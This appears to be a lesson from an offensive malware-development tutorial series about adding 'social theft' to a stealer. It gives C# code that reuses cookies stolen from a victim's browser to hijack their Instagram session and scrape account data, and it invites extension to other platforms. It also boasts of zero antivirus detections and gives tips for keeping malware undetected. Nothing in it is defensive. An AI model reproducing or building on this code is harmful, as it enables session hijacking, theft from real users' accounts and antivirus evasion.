Lesson 6: Social Theft in Malware Development
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 6:
6. Social Theft:
⇢ Instagram Sub Count
⇢ YouTube Sub Count
⇢ Github Follower Count
more…
Our lives now revolve on social media, thus it seems sense that social media analytics are highly regarded by both businesses and people. In this lesson, we’ll demonstrate how to add function in your malware to harvest social media analytics from well-known websites like YouTube, GitHub, and Instagram.
To begin, we will use cookies to authenticate login to the user’s Instagram session. You already know, cookies are small text files stored on a user’s computer by websites to remember their preferences or login information. In previous lesson of Browser Theft, we captured the stored cookies of user’s and then wrote them to the text file, those cookies will now be used in this case to authenticate our session with Instagram and other Social platforms and gain access to the user’s profile information for harvesting data.
First, we need to load the cookies from a file called “cookies.txt.” (or anything you named in previous lesson). Write a function to read these cookies from the file and filter out only the targeted social website cookies by looking for the string. For example for instagram.com it will look at the following string “.instagram.com.” Make sure it covers all the subdomains under the main TLD domain. Below is the sample code with instagram example; you can create more such functions for other websites like Github, Youtube, Twitter, Facebook & other social platforms to capture user’s Subscriber, Followers, Posts, Views Count.
// social theft
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net.Http;
using System.Threading.Tasks;
namespace InstagramLogin
{
class Program
{
static async Task Main(string[] args)
{
// Load cookies from file and filter out Instagram cookies
List<string> cookies = await LoadCookiesFromFile("cookies.txt");
List<string> instagramCookies = cookies.Where(cookie => cookie.Contains(".instagram.com")).ToList();
// Login to Instagram using the filtered cookies
HttpClientHandler handler = new HttpClientHandler();
handler.CookieContainer = new System.Net.CookieContainer();
foreach (string cookie in instagramCookies)
{
string[] cookieParts = cookie.Split('\t');
handler.CookieContainer.Add(new System.Net.Cookie(cookieParts[0], cookieParts[6], cookieParts[2], cookieParts[3]));
}
HttpClient client = new HttpClient(handler);
HttpResponseMessage response = await client.GetAsync("https://www.instagram.com/");
string responseBody = await response.Content.ReadAsStringAsync();
// Extract follower count from response body
int followerCount = int.Parse(responseBody.Split(new[] { "\"edge_followed_by\":{\"count\":" }, StringSplitOptions.None)[1].Split('}')[0]);
Console.WriteLine("Follower count: " + followerCount);
// Extract post count from response body
int postCount = int.Parse(responseBody.Split(new[] { "\"edge_owner_to_timeline_media\":{\"count\":" }, StringSplitOptions.None)[1].Split('}')[0]);
Console.WriteLine("Post count: " + postCount);
}
static async Task<List<string>> LoadCookiesFromFile(string filename)
{
List<string> cookies = new List<string>();
using (StreamReader reader = new StreamReader(filename))
{
while (!reader.EndOfStream)
{
string line = await reader.ReadLineAsync();
if (line.Contains(".instagram.com"))
{
cookies.Add(line);
}
}
}
return cookies;
}
}
}Finally, I wrote functions to capture Facebook, Twitter, Instagram & YouTube social performance & compiled all the topics of lesson 6 & it was detected by 0 out of 26 antivirus scans. Below is the antivirus scan report from antiscan.me :
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
Collecting social media metrics may be quite beneficial, and we explored how to create a malware programme that can take data from prominent social media platforms such as Instagram, YouTube, and GitHub in this lesson. With this knowledge, you may create more strong and effective malware tools. Keep tuned for our next session, in which we’ll look at how to remotely access and operate an infected device.
